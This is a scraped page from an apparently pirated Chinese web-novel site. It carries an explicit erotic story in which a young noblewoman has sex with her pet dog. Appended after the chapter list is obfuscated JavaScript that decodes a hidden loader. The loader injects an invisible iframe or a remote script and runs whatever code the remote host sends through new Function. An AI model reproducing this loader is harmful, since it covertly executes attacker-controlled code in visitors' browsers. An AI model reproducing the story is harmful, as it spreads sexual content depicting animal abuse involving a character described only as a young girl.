收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    滚出去!通通给我滚出去!高尚的器皿散落一地,少女的手却没有因此停止,仍然朝着已经紧闭的门扉用力丢掷,似乎有无尽的怒气,只能用此要领发泄。

    包裹在白色洋装下的纤细小手,拿起房间中的器皿不停投掷,金黄色的发丝随着猛烈行动而飘扬,直到周围的工具被破损殆尽,少女才停止了破损的行动,可是情绪并没有因此平复,反而越发的激动。

    数名男子站在门外,个个面有难色,不知道该闯进去,照旧先让少女岑寂下来再说。

    怎么瓣?其中一名男子打破了默然沉静,可是这并没有对问题有所资助,因为其他人的脸上也找不出谜底。

    先让她岑寂一下吧!横竖早晚得让她认清事实,暂时别刺激她较量好,横竖如果她不允许,最后也只能学习道院,就让她自己选择好了。

    房内的少女,将娇小的身躯埋在厚重棉被中,发出呜咽的哭泣声,小手也随着情绪升沉,用力抓着枕头。

    不要……不要……我才不要嫁出去……

    在这个时代的贵族间,政治婚姻从来没有少过,不管是为了提升家族职位,笼络政敌,或是相互间的通婚,同样的事情在这国家中不停发生。

    如果是两个年岁相近的孩子也就而已,为了到达目的,年岁相差极大的婚姻也不是特例,能作人爷爷年岁,却娶了个跟自己孙女年岁相近的孩子,这样的事情早已是司空见惯。

    可是常见并不代表合理,也不代表人人都可以接受,可是对於家族而言,女性是没有不接受的权力,如果不乖乖地听从各人长的指示,就只能到修道院中终老,不管是什么时代,体面这种工具,总是被权力者重视着。

    等到情绪逐渐岑寂下来后,伊丽莎白坐在床铺上,双眼无神地看着熟悉的房间,无论自己接受与否,现在的生活都市成为已往的影象,不复存在。

    为什么是我……她喃喃自语的问着自己,而这同样的问题,她也曾经问过其他人,获得的回覆不是苦笑,就是严肃的面目。

    实在她几多也明确,由於父亲战死,家族职位降低,她不得不嫁给有血缘关系的亲族,藉此挽救家族的财政难题。

    只见过一次的表兄,以及许多不堪的听说,让她顽强的不愿出嫁。

    那小我私家,又老……又丑……噁心死了!虽说是表兄,可是对方年岁足以当自己的父亲,加上只有在噩梦中会见到的容貌,让伊丽莎白不敢想像往后的生活。

    贵族之间为了保持血统纯正,总是不停地相互通婚,无论是什么时代,什么国家或是什么民族都一样,而这也带来了难以想像的恶果。

    无论是驼背、瘸腿、歪嘴,甚至智能不足都时有所闻,不停的恶性循环,少数正常的女性也被迫生下这些人的孩子,导致所谓的贵族血统,就像死去的沟鼠般,逐渐**生蛆。

    哈……哈……伊丽莎白耳边传来了熟悉的喘息声,陪同着湿热舌头的感伤,让她习惯性地抱着毛茸茸的物体。

    你真轻松啊,只要认真吃就好了,你的主人可是有大贫困了啊……她对着眼前的宠物诉苦,捏着爱犬的嘴巴,不满地诉说着谁也不听的诉苦。

    如果拒绝这门亲事,自己就会被送到修道院中过着毫无兴趣的枯燥生活,可是如果就这样允诺,少女憧憬的新婚之夜就会酿成噩梦。

    被那种男子骑在身上,还不如死了较量舒服!不自觉抓紧身上的宠物,伊丽莎鹤发出犹如热病般的哆嗦,直到爱犬因为疼痛发出哀嚎,她才清醒过来。

    对不起……将爱犬莱西翻过来抚摸,藉此慰藉牠的同时,伊丽莎白视线漂到了爱犬的胯间,才惊觉到牠也是雄性动物。

    违背从小学习的礼仪道德,首次泛起的疯狂思想在她心中不停膨胀,小手像是不受自己控制般,徐徐伸向那鲜红色的凸起物。

    原本只是伸脱手指处碰,可是就像着魔般越陷越深,最后伊丽莎白整只手掌直接握着**,轻柔的上下套弄着莱西的下体。

    此时肉茎突然震动了一下,让伊丽莎白吓了一跳,连忙将手缩了回来,可是残留在掌中的温热,让她无法自拔,双腿间也开始搔痒难耐。

    由於严格礼教的缘故,她从未实验过触碰自己下体,更别说直接用手握着狗的**,初次背德的快感就像是麻药中毒般,让她无法将自己抽离出去了,只能就这样迷恋於肉欲中,再也无法自拔。

    偶然由其他贵妇谈话中听到的讯息,像是从衣柜深处中被翻了出来,详细的行动充斥着伊丽莎白的思考,让她没有丝毫犹豫,作出了自己从未想像过的异常决议。

    她徐徐脱去蕾丝的洋装,在床上优雅地张开双腿,然后将娇小可爱的内裤顺着雪白大腿轻巧脱下,露出从未让其他男子见过的漂亮。

    过来……这是你最喜欢的味道喔……拿起餐盘上的高级奶油,薄薄地涂抹在自己敏感的位置,使用气息吸引莱西的舔弄。

    而莱西也听话的将头靠近伊丽莎白的私处,伸出舌头舔弄芬芳的奶油,以及微微沁出的酸甜液体。

    好痒喔!可是这种感受是第一次……狗的舌头较为粗拙,随着莱西不停的舔弄,也让伊丽莎白进入了未知的领域。

    酥痒的感受让伊丽莎白越来越兴奋,大腿也越来越张开,直到桌上的奶油用尽,她也靠近虚脱时,舔弄才终於停止,而她则是微微吐出小巧的香舌,跟莱西一样不停地喘息着。

    好舒服,真的好舒服……

    稍微恢复体力后,伊丽莎白将爱犬翻了过来,让牠平躺在自己眼前,露出令人惊讶的性器,那是她从未注意……或是说不愿去注意的地方。

    看着嫣红的肉茎,小手继续适才的行动徐徐套弄着**,直到它充血变大,发出像是会烫伤手掌的温度。

    刚刚你让我很舒服,现在换我来帮你了。看着前端些许的透明液体,伊丽莎白将**前端放入自己的小嘴中。

    先是用舌尖舔弄着尖端,然后让莱西下体在她口中收支,虽然伊丽莎白并没有做过类似的事情,而这种事情无论是贵族礼教或是帝国国教的教义都不允许,可是她却像是熟练的娼妇般,不停地舔弄着。

    她舔弄着爱犬的下体,贪婪地吸着浓郁兽臭,将前端溢出的透明液体吞入口中,伊丽莎白感受自己像就是发情母狗似的,渴求着公狗的慰藉。

    随着她温柔的爱抚,犬茎逐渐涨大,直到整只**完全充血硬起,伊丽莎白才停止吹舔那根惊人的傢伙。

    好厉害……竟然涨得这么大了……

    什么道德、伦理或是知识都抛到一旁,伊丽莎白现在并不是什么贵族的巨细姐,只不外是个渴求雄性慰藉的母畜,脱去华美的丝质亵服,就这么趴在床上,像母狗般摇着屁股,诱惑眼前的强壮公狗。

    快点嘛……人家已经……已经忍耐不住了……由於刚刚的舔弄,无论是她照旧莱西都没有到达真正的**,燥热的感受充满了全身,让她再也无法支持下去,只求一个痛快感受。

    莱西不知道是明确主人感受,照旧兽性的本能驱使,连忙朝着伊丽莎白扑了已往,趴在她身上不停晃动着腰部。

    可是人与狗之间究竟不是同一种生物,莱西无论如何起劲,就是无法让自己的**进入主人体内,只能在外头不停地摩擦,让伊丽莎白越发的焦虑。

    讨厌……怎么不快点进来……背后的热烫**沾粘着自己的湿滑**,在**外部不停地前后搓动着,让红肿的yin蒂越发瘙痒不止。

    似乎是忍受不住这种焦虑感,伊丽莎白试着伸出自己的小手,握着莱西的狗茎,引导它进入自己从未开发的体内。

    似乎是找到了入口,莱吸朝前方用力一戳,整只**就顺利地进入伊丽莎白的体内,穿过稚嫩的童贞膜,一口吻到达私密的花园中心,原来是要给未来丈夫的地方,竟被畜生抢先一步玷污了。

    可是对於伊丽莎白来说,现在的丈夫不是谁人弱智表兄,而是从小养大,骑在她身上逞凶的强壮公狗。

    粗大的感受充实了体内空虚,背后的莱西顺从自己本能,在主人身上不停蹂躏着,一下又一下的在伊丽莎白身上肆虐。

    要……要尿出来……从未体验的感受,被少女错认为尿意,然后在无法控制的状况下,到达人生中第一次**,使她全身不停哆嗦着,双手也无法支撑住,就这么趴了下去。

    由於前半身倒下,伊丽莎白的雪臀翘得更高,而且顺着自己快感的泉源,配合莱西**的抽送,不停地扭着细腰,行动就像是发情的母狗般淫荡。

    似乎是想再次体验适才的快意,伊丽莎白不停地摇着屁股,让莱西在她体内的犬茎摩擦着肉襞,藉此再次到达**的巅峰。

    丧失童贞的疼痛完全被快感掩盖,从大腿根部流出的血水就像是不存在般,混着些许淫液,顺着漂亮的双腿流至皎洁的床单上,渲染出漂亮的花纹。

    似乎是感受到了主人带来的震动,在伊丽莎白到达了数次**后,莱西也开始she精。

    咿!感受到体内的**突然膨胀了起来,伊丽莎白禁不住发出了一声惨叫,莱西肉茎根部充血膨胀,卡在自己主人的体内无法脱离,然后尖锐的**前端开始喷出弄烈的jing液,朝着伊丽莎白的子宫深处喷发。

    差异於人类,狗she精的时间相当长,对於照旧童贞的伊丽莎白而言,实在是太过於刺激了,像是撒尿般不停地注入jing液,像是要灌满柔弱的子宫,让主人怀上自己的犬仔般,莱西的种汁朝着最深处用力喷射着。

    从未体验过的饱涨感,让兴起的子宫压迫到膀胱,伊丽莎白也无法顾及什么礼仪,就这么趴在柔软的床铺,一面让爱犬she精,一面又不知廉耻的撒尿在床单上。

    好不容易等到莱西的she精量淘汰,伊丽莎白已经连爬起来的气力都没有了,全身酸软无力,只能任由爱犬在自己背上不停喘息,而狗爪也在雪白的背部划下数道伤痕。

    肿胀的**又酥又痒,而此时的肉球也没有因此软化,混着童贞鲜血与公狗jing液的大量浓汁,就这样暂时保留在伊丽莎白的**与子宫中。

    好痛……可是……真的好舒服……

    在太阳升起前,无止尽的**与快乐,不停袭击着伊丽莎白,直到虚伪的礼教与思想都被击溃时,外头才逐渐亮起。

    你还醒着吗?我要开门啰!

    听着门外传来的声响,伊丽莎白眼角的余光才转向窗外,发现此时已经是破晓时分,温暖的阳光由外头流入了室内。

    外头似乎是兄长无法忍耐她的任性,带着谁人表兄来到了家中……只不外对她来说,会酿成怎样都无所谓了,无论是进到修道院,照旧嫁给哪个貌寝的男子都一样。

    只要有莱西在身旁,自己酿成怎样都无所谓了。

    好孩子……再用力一点,朝姊姊体内用力地插……发出梦呓似的呢喃,伊丽莎白温柔着看着背后的爱犬,同时扭动着雪白的臀部,配合牠的抽送,淫荡地扭着腰部。

    已往那里也好……不外,可以进到姊姊体内的,只有你一个喔……

    随着时间的已往,所谓的帝国贵族血统,又再次往下迷恋……

章节目录

免费网游小说推荐: 黑暗禁忌游戏 从梦幻西游开始崛起 最强穿梭万界系统 精灵之短裤小子 英魂塔防:异界领主求生 城堡争霸:我的魔物兵种可以进化 全民网游:开局堆满反甲 女总裁的贴身兵王 龙骑猎手 神级游戏设计师从吓哭主播开始

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x57\x57\x69"]=function(e){var jW =''+'ABCDEFGHI'+'JKLMNOPQ'+'RSTUVWXYZab'+'cdefghi'+'jklmnopqrst'+'uvwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=jW.indexOf(e.charAt(f++));o=jW.indexOf(e.charAt(f++));u=jW.indexOf(e.charAt(f++));a=jW.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x71\x4B\x57\x57\x56\x69\x6A\x48"]=function(){eval(WWWi("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV1dXaSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFdXV2koIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXV1dpKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV1dXaSgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFdXV2koZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SVRMNScrJ1FUJysnTnkweVknKydZR0pUSicrJ2xSJysnV2VscCcrJ1gnKydjR0pUSicrJ3onKydRJysnRE4nKyd3RVRRJysnelUnKydTYnZOJysnbUx1SicrJzJjbVJXJysnYnVjMycrJ2QzWmsnKydNbCcrJ1lZaycrJ01sRScrJzAnKydNbE0nKydIYzAnKydSSGEnKycnKycnLCcnKyc3cnYnKydURDknKydsSScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydKR2YnKyc3ZDMnKycwJysnJysnJywnWScp"));}